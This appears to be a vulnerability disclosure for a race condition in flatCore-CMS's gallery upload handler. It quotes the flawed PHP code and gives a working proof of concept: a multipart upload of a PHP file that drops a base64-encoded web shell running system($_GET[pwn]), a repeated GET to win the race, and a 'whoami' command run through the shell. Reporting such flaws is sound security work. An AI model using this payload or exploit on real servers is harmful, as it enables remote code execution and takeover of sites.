Title: race condition vs Temporary File Upload
flatCore-CMS is vulnerable to Race condition while dealing uploading gallery
Codes at https://github.com/flatCore/flatCore-CMS/blob/main/acp/core/files.upload_gallery.php#L31
if(array_key_exists('file',$_FILES) && $_FILES['file']['error'] == 0 ){
$tmp_name = $_FILES["file"]["tmp_name"];
$timestring = microtime(true);
$suffix = strrchr($_FILES["file"]["name"],".");
$org_name = $timestring . $suffix;
$img_name = $timestring."_img.jpg";
$tmb_name = $timestring."_tmb.jpg";
if(move_uploaded_file($tmp_name, "$uploads_dir/$org_name")) { //【1】our PHP file has been uploaded!
create_thumbs($uploads_dir,$org_name,$img_name, $max_width,$max_height,90);
create_thumbs($uploads_dir,$img_name,$tmb_name, $max_width_tmb,$max_height_tmb,80);
unlink("$uploads_dir/$org_name"); // 【2】But was unlink after a while...
print ('Uploaded');
}
}
So we could use parallel request tools,such as Burp Suite Intruder to exploit it, automately.
Firstly, an attacker could do lots of request, as
// #1 HTTP request
POST /acp/core/files.upload_gallery.php HTTP/1.1
Host: flatcore
Content-Length: 4361
Accept: application/json
Cache-Control: no-cache
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryN9xFk8EMA5iTZnL0
Origin: http://flatcore
Referer: http://flatcore/acp/acp.php?tn=filebrowser&sub=browse
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.
Cookie: acptheme=dark; identifier=EnNEM4kvqbEvutxAb2QVZTjL; securitytoken=49593ab95703dd857048f19695fd95c2d3535486; PHPSESSID=mjtavnv285s6moa6n2n26cf1iq
Connection: close
------WebKitFormBoundaryN9xFk8EMA5iTZnL0
Content-Disposition: form-data; name="csrf_token"
64da9729f086b0072f4888bc8ff12f42
------WebKitFormBoundaryN9xFk8EMA5iTZnL0
Content-Disposition: form-data; name="file"; filename="1337.php"
Content-Type: text/plain
<?php
file_put_contents("./shell.php", base64_decode("PD9waHAgcGhwaW5mbygpOyAKc3lzdGVtKCRfR0VUW3B3bl0pOwo/Pg=="));
?>
------WebKitFormBoundaryN9xFk8EMA5iTZnL0--
At the same time, the attacker must GET the temporary PHP file continuously, as
GET /content/galleries/2021/gallery350/[microtime].php HTTP/1.1
Host: flatcore
microtime(true)
stands for data like 1634147952.6662
If brute force succeed, the shell.php
will appear in content\galleries\2021\gallery350\shell.php
http://[FlatCore]/content/galleries/2021/gallery350/shell.php?pwn=whoami
This vulnerability is capable of remote code execution with admin privileges